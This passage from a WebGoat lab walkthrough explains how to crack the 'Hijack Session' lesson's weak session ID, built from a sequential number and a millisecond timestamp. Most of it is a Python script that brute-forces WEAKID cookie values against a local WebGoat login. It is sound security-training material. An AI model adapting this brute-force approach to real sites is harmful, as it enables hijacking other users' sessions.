- a sequential number
- time (in milliseconds)
The first part of the solution implies using WebScarab's session analysis features. After finding out the missing number, and the time range for the missing number, the session cookie can be easily cracked. A Java tool for doing this is J-Baah.
A simple python script to do just that, brute force the time variable, could be:
'''
Fuzzer for weak session ID (WebGoat Hijack Session level)
'''
import httplib
if __name__=="__main__":
httpServ = httplib.HTTPConnection("127.0.0.1", 80)
httpServ.connect()
for wid in range (473, 582):
weakid = "10991-1322155944%s" % wid
headers = {"Host": "localhost",
"Proxy-Connection": "keep-alive",
"Content-length": "69",
"Cache-Control": "max-age=0",
"Origin": "http://localhost",
"User-Agent": "Fuzzy",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Referer": "http://localhost/WebGoat/attack?Screen=192&menu=1700",
"Accept-Encoding": "gzip,deflate,sdch",
"Accept-Language": "en-US,en;q=0.8",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
"Cookie": "JSESSIONID=E7F6B85DD9423511BF95E45B70332DAB; WEAKID=%s" % weakid,
"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}
httpServ.request('POST',
'/WebGoat/attack?Screen=192&menu=1700',
'Username=Jack&Password=sniffy&WEAKID=%s&SUBMIT=Login'% weakid,
headers)
response = httpServ.getresponse()
print "weakid: ", weakid
print response.read()
httpServ.close()
(Modifications needed for adjusting the missing sequential number (found through WebScarab session analysis), and the time range. )
